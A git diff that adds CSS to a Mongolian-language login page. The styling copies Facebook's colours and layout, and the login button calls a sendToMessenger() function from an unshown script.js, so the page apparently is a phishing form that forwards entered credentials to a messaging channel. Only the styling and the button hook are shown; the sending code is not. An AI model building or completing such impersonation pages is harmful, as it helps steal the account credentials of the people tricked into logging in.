--- a/index.html
+++ b/index.html
@@ -5,7 +5,51 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Нэвтрэх</title>
     <style>
-        /* Стилиуд */
+        body {
+            font-family: Arial, sans-serif;
+            background: #f0f2f5;
+            display: flex;
+            flex-direction: column;
+            align-items: center;
+            justify-content: center;
+            height: 100vh;
+            margin: 0;
+        }
+        .login-container {
+            background: white;
+            padding: 20px;
+            width: 360px;
+            border-radius: 8px;
+            box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.2);
+            text-align: center;
+        }
+        .login-container h2 {
+            font-size: 24px;
+            margin-bottom: 20px;
+            color: #1877f2;
+        }
+        input {
+            width: 100%;
+            padding: 12px;
+            margin: 10px 0;
+            border: 1px solid #ddd;
+            border-radius: 6px;
+            font-size: 16px;
+        }
+        .login-btn {
+            width: 100%;
+            padding: 12px;
+            background: #1877f2;
+            color: white;
+            border: none;
+            border-radius: 6px;
+            font-size: 18px;
+            cursor: pointer;
+            font-weight: bold;
+        }
+        .login-btn:hover {
+            background: #166fe5;
+        }
     </style>
 </head>
 <body>
@@ -17,6 +61,7 @@
         <button class="login-btn" onclick="sendToMessenger()">Нэвтрэх</button>
     </div>
 
-    <script src="script.js"></script> <!-- script.js файлыг энд оруулна -->
+    <script src="script.js"></script>
+
 </body>
 </html>
